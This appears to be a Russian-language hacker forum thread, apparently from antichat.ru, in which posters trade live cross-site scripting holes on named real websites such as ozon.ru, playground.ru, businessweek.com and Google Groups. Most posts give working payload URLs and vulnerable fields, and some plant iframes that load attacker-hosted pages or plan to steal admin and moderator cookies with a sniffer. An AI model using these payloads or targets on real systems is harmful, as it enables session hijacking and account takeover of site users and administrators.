www.skisport.ru Оффициальный сайт журанала лыжный спорт. Пример скрипта: HTML: http://www.skisport.ru/search/index.php?search=%3Cscript%3Ealert%28%27fatalo+for+antichat.ru%27%29%3C%2Fscript%3E&days=&dts=&dte= У этого ресурса бажная функция поиска по сайту. Как обычно пишем: PHP: <script>alert('antichat.ru want you!')</script> И творим добро =)
А зря может кто нить научился бы xss различать vkadre.ru собственно тыкая создать добавить ролик вбиваем имя Code: </title><script>alert(/xss/)</script> + cобственно канает любой тег главное title закрыть вотс уже рабочий линк http://vkadre.ru/users/1926899 Кто хорошо подумает может на самом контакте активку найти
вообшем то сайт ру подкастинга rpod.ru собсвенно уязвимо поле коменнентов т,е заходим выбириаем группу тему и оставляем коммент Code: <iframe src="http://blabla.ru/index.html" < ну и собственно создаем на домене blabla.ru index.html c нужным кодом ) рабочий пример с фреймом на гугль.ru ) http://siski-piski-show.rpod.ru/82.html#c110876
Тока что нашел одну ХСС у себя на форуме на mybb.ru, наверно баян, но все же. В профиле есть вкладка "остальное", в админке можно разрешить пользователям заполнять ее. Пишем <script>alert()</script> и вуаля. А дальше ищите дурака админа, который разрешил эти поля. Проблема в длинне. Максимум на серве 999 символов, а там, кто как поставит.
Нашел уязвимость на www.playground.ru Жмем регистрация и вставляем <script>alert()</script> Уязвимые поля: Конфигурация компьютера Ваш сайт О себе Вот моя рега http://users.playground.ru/448520/
Журнал Total Football http://www.totalfootball.ru Добавляем комментарий к новости, уязвимы все поля Также присутствует пассивка в поиске, и если поискать sql-inj
Случайно нашел доску объявлений. Уязвимы все комменты к товарам. http://stolbik.kiev.ua/b5111492.html А в поиске сидит пассивка: _http://stolbik.kiev.ua/search_sp.php?text=%22%3E%3Cscript%3Ealert%28%27XSS+from+Light%27%29%3C%2Fscript%3E&group=0&search_butt.x=28&search_butt.y=9
Вот еще: http://www.inox.ua/?check=guest_book<=1213543321953 Уязвимые поля: Имя, www, сообщение. Частенько админ заглядывает в гостевую и коментит, можно его поймать))) В поиске тоже сидит пассивка. __________ Админ прикрыл посты без модерации, но XSS осталось, поэтому когда одмин будет просматривать, его можно накормить снифером...
Вот какого зверя я нашел на этот раз: http://www.ilovedress.ru/catalogue/shops/?pid=168 уязвимым оказалось имя пользователя ЗЫ Админка тоже на глаза попалась http://www.ilovedress.ru/admin/login.php Я только не особо воткнул, что выскакивает по этой ссылке http://www.ilovedress.ru/catalogue/shops/?pid=0 ____________ Админ прикрыл гостевую, наверно фильтр поставит(((
хочешь удивиться ? ))) выскакивает alert(document.cookie) просто в куках кроме id cессии не чего нет )
Пасиба что растолковал, я примерно догадывался, но надо было по точнее узнать. А вот мой утренний XSS, так сказать за завтраком. http://www.iemag.ru/articles/detail.php?ID=6308?add-comment
Вот моя вечерняя XSS, есть над чем поугарать, специально для самых внимательных. http://www.tabacum.ru/showinfo.php?id=63 Поля: имя и коммент
businessweek.com полезно иногда новости читать постим коммент к новости Code: <iframe src=http://ha.ckers.org/scriptlet.html < содержание scriptlet.html думаю сами понимаете )) Code: <SCRIPT LANGUAGE="JavaScript">alert('XSS')</SCRIPT> воврашаемся обратно по линку с новостью )) вуаля ) для примера вот news http://www.businessweek.com/technology/content/jun2008/tc20080616_034849.htm?chan=technology_technology+index+page_top+stories P.S вся эта радость работает из за отображения последнего коммента во время поста нового но на странице где отображаються все комменты все нормально фильтруеться )
комментарии на wiki.xakep.ru собственно пример: Code: http://wiki.xakep.ru/(S(binh5p451x3ngf45fdpipz55))/fononnyi_kompyuter.ashx?Discuss=1&NoRedirect=1
продолжим с гуглом... greetz to xcedz, закобяка ты ендакая.. Заходим в группы и заливаем в файлы html-файл. Вот пример: http://here-is-xss.googlegroups.com/web/XSS.htm?gda=Z1hfxDgAAAA76U5U5sly8vjF2QR9OTG0MTrRWPVPWrWJTq_RUQGHwWG1qiJ7UbTIup-M2XPURDQUbzuizSHsttw_trxthalY Ъхек
коментарии вот собственно пример http://www.new-most.info/press-centre/announcements/4508.htm#comment Блин- в алерте написал Россия-чемпион (сайт был украинский) теперь прежде чем вывесить комент комент пишет что типа ваш комент будет добавлен после проверки модератором)))- а мож это и неплохо совсем- так окажется гарантия если прийдут куки то что куки модера или админа)))
ozon.ru В отзыве на товар, уязвимое поле Страна/город. Недостаток в том, что нужно ждать два/три дня пока отзыв отправится в паблик. Пример: http://www.ozon.ru/context/detail/id/3819533/ Code: <td colspan="3" align="right" class="vertpadd" style="padding-right:20px; color:Gray;">Мамедов (<a href=/context/client_opinion/ClientGuid/9596607c-384f-4f1e-a17f-ac49e92840c4/>все отзывы</a>), Москва[B]<fuck>[/B], 21 год </td>
Пров Дом.сру, биллинг http://tmn.citydom.ru/bill/ Активная ксс у операторов в статистике (в забаненных логинах, при большом кол-ве неправильных попыток), уязвимо поле Логин
